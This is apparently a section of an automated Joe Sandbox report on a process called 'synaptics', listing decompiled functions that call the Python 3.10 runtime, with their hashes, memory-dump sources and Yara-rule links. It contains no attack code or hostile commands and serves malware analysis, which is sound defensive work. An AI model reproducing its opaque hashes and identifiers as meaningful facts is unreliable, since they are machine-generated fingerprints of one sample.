                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CompareObject_RichUnicode_
                                                                                                                                                                                                      • String ID: @Btl
                                                                                                                                                                                                      • API String ID: 3075251945-3323547406
                                                                                                                                                                                                      • Opcode ID: b0bf0e60295ce6d87c91bc6fd161a71a20c0a4f508607052ef07b51c2d56e00a
                                                                                                                                                                                                      • Instruction ID: 9fc2a576b77b42668ca796f516b64fa23a01ee5ee68ca909f95ad5e9ff66e670
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0bf0e60295ce6d87c91bc6fd161a71a20c0a4f508607052ef07b51c2d56e00a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB81AC71A012059FDB04CF99E880E99B7F4FF58329B144269EC29DBB95D730E942CB90
                                                                                                                                                                                                      Function 6C4AD5C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000), ref: 6C4AD699
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,?), ref: 6C4AD762
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Memorymemset
                                                                                                                                                                                                      • String ID: @xJlr
                                                                                                                                                                                                      • API String ID: 3105220421-974396298
                                                                                                                                                                                                      • Opcode ID: d40f368698a266763a9ee8c54293aa8bc8beab73c2146d9fabef764d6f8132e8
                                                                                                                                                                                                      • Instruction ID: 0ca10baa39719fa79cdd6628696d9f599576f0fc44d8b502f2cf395ee7fedd0e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d40f368698a266763a9ee8c54293aa8bc8beab73c2146d9fabef764d6f8132e8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B151A074E046018BC704CF68C840D5AB7E5BFD8319F248A2DECAC97755EB31E9968B82
                                                                                                                                                                                                      Function 6C45EC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,byte string is too large,?,?,?,?,?,6C466F2A,?,?,?,?,?,6C467443,?), ref: 6C45EC88
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • byte string is too large, xrefs: 6C45EC81
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                      • String ID: byte string is too large
                                                                                                                                                                                                      • API String ID: 1450464846-405193710
                                                                                                                                                                                                      • Opcode ID: a847da2f844162338fc7d7b0abefe112eebe8749fec21f7cc526b200245820e1
                                                                                                                                                                                                      • Instruction ID: ffc10274b959d623ab888c33f5bbdf624e856942139ff29c70a67a69a562a806
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a847da2f844162338fc7d7b0abefe112eebe8749fec21f7cc526b200245820e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA216E737001045B8A11E65EBC85C66B7A9DBC623BB94037AEC2CC7F90FA21D82845D1
                                                                                                                                                                                                      Function 6C589190 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyRuntime_Initialize.PYTHON310(?), ref: 6C5891CA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InitializeRuntime_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 226365341-0
                                                                                                                                                                                                      • Opcode ID: 4064677133b9d0527c7606878c47385e3a8819bb86521710daa4dbb37a272565
                                                                                                                                                                                                      • Instruction ID: 84963aa46f6390d5ad11065ce545de24884a79030b88f6860a9ad1702d1d2577
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4064677133b9d0527c7606878c47385e3a8819bb86521710daa4dbb37a272565
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1821B1719093548BD321CF55D804BDBB7F8EFC1318F084629E98C87660EB719988C7A2
                                                                                                                                                                                                      Function 6C4D2DA0 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 3af51a40534c401a5719c7c53fa1af7549877555eb75382cb1222292e4e7ff03
                                                                                                                                                                                                      • Instruction ID: 0a2c303e49a0424807d7e2d46df164f4f37345e2de5e6b71e4ca0d8a43efd2e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3af51a40534c401a5719c7c53fa1af7549877555eb75382cb1222292e4e7ff03
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8601B177B011206BCA10E69DECD4EE663A8DFC52BBB090176EA44CBB01D715EC1993F0
                                                                                                                                                                                                      Function 6C4A2FA0 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,00000000,6C4A08CA,?,?,6C4A0276,?,6C4A08CA,00000000,?,?,6C4A08CA), ref: 6C4A2FC7
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?,00000000,?,?,6C4A08CA), ref: 6C4A2FDA
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(6C4A08CA,?,?,?,00000000,?,?,6C4A08CA), ref: 6C4A2FEE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$AttrFromInternObject_PlaceString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2566056274-0
                                                                                                                                                                                                      • Opcode ID: 15e40047debc083ad3908ea1f73ddca40adc28a40d1e802b47444d1f26c035ba
                                                                                                                                                                                                      • Instruction ID: 9b42daf2242e2872425f5bd6e210555e01d9354ad8e613f114719a30c9a6b5a2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15e40047debc083ad3908ea1f73ddca40adc28a40d1e802b47444d1f26c035ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0301F9736042056BDB00CE99FC00DDA7BA8DF842797144239F92C87790EB32E916D7D1
                                                                                                                                                                                                      Function 6C476DD0 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,?,?,6C55371C,?,strict,00000000,?,?,?,?,00000001,?,?,?,?), ref: 6C476DD7
                                                                                                                                                                                                        • Part of subcall function 6C4D2B20: _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,6C44F059,?), ref: 6C4D2B5A
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(00000000,00000000,?,00000000,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C476DF3
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000001,?,?,?,?), ref: 6C476E02
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: StringUnicode_$Dict_Err_FromInternItemPlace
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2962130677-0
                                                                                                                                                                                                      • Opcode ID: db5803dbd4d699881b2e73686564221da203c369b68fcb2e2464a1e60c73a851
                                                                                                                                                                                                      • Instruction ID: 04bd9efbb65b699251b3fffccf286eb988317125b9c5f92bde73d26341313f93
                                                                                                                                                                                                      • Opcode Fuzzy Hash: db5803dbd4d699881b2e73686564221da203c369b68fcb2e2464a1e60c73a851
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECF0BB76900109A7CB10DE65EC01CDA776DDF41235B1407A9FC2887790EB31EE15D7E1
                                                                                                                                                                                                      Function 00541000 Relevance: 4.5, APIs: 3, Instructions: 10COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00541001
                                                                                                                                                                                                      • __p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00541009
                                                                                                                                                                                                      • Py_Main.PYTHON310(00000000), ref: 00541012
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Main__p___argc__p___wargv
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3246942480-0
                                                                                                                                                                                                      • Opcode ID: 83e2e6e13066018cb5bb81d24e569ecc0eb6e0a328a7497726c61183d8e11aa8
                                                                                                                                                                                                      • Instruction ID: dad97c7965a39c87c74603a9038e2912be2e34a458ffd13b3c9420f4c4dc93ce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83e2e6e13066018cb5bb81d24e569ecc0eb6e0a328a7497726c61183d8e11aa8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3C0027A4010349FC6056B25EC0C9CA3BA5BF2721AB850451F90E97131CB211969EAA6
                                                                                                                                                                                                      Function 6C577400 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,Empty module name), ref: 6C577432
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                        • Part of subcall function 6C576C30: PyType_IsSubtype.PYTHON310(?,?,-000000FF), ref: 6C576C80
                                                                                                                                                                                                        • Part of subcall function 6C576C30: _PyUnicode_EqualToASCIIString.PYTHON310(?,<frozen importlib._bootstrap>,-000000FF), ref: 6C576CB5
                                                                                                                                                                                                        • Part of subcall function 6C576C30: _PyUnicode_EqualToASCIIString.PYTHON310(?,<frozen importlib._bootstrap_external>,?,?,-000000FF), ref: 6C576CC9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$EqualErr_Unicode_$ObjectSubtypeType_
                                                                                                                                                                                                      • String ID: Empty module name
                                                                                                                                                                                                      • API String ID: 1935302101-1960378757
                                                                                                                                                                                                      • Opcode ID: e72f690c2dfdfe4fb8b1d9721ef3a410d8af2aea9528222f66db152c697d65cc
                                                                                                                                                                                                      • Instruction ID: 550bcb1531c8f40af1bfaed6c93d1cde71575f45cf9d8a565afe1b353bf9acb2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e72f690c2dfdfe4fb8b1d9721ef3a410d8af2aea9528222f66db152c697d65cc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0110671B047118BC732CE2AEC8066ABBE5EBC46A8B440729EC54C7B41E720CC9597E2
                                                                                                                                                                                                      Function 6C4D2B20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,6C44F059,?), ref: 6C4D2B5A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                      • String ID: input too long
                                                                                                                                                                                                      • API String ID: 1450464846-2786935005
                                                                                                                                                                                                      • Opcode ID: fecfca2be8605a42c9ca18be70989c8b42b867f1f6a55d20b36ff9cafe561be9
                                                                                                                                                                                                      • Instruction ID: c7bf04642b554dfe1c1ab233e5dc9c643fdb3608864cb7a3030e789d58e3ba08
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fecfca2be8605a42c9ca18be70989c8b42b867f1f6a55d20b36ff9cafe561be9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F09E72F0820416CA109D697C17FD2B38D8BC523DF004390EC5C9BFC0ED51390441D1
                                                                                                                                                                                                      Function 6C4A6220 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,6C577D11,00000000,6C4A6240), ref: 6C4A6234
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: realloc
                                                                                                                                                                                                      • String ID: @bJl
                                                                                                                                                                                                      • API String ID: 471065373-3213955731
                                                                                                                                                                                                      • Opcode ID: a18aa911b6baf3f83495ce27ff5a40769bbe8ae71e63fc809afc71aa1bb48ce8
                                                                                                                                                                                                      • Instruction ID: d5c681f9bd6d5bdd9c8b48e7007afc78ffed5a41260e2d52d6ace32089a4be03
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a18aa911b6baf3f83495ce27ff5a40769bbe8ae71e63fc809afc71aa1bb48ce8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C012B021030CABEB042E28EC1AA6A33ECBB44A05F000028FC2A82210E662BD208568
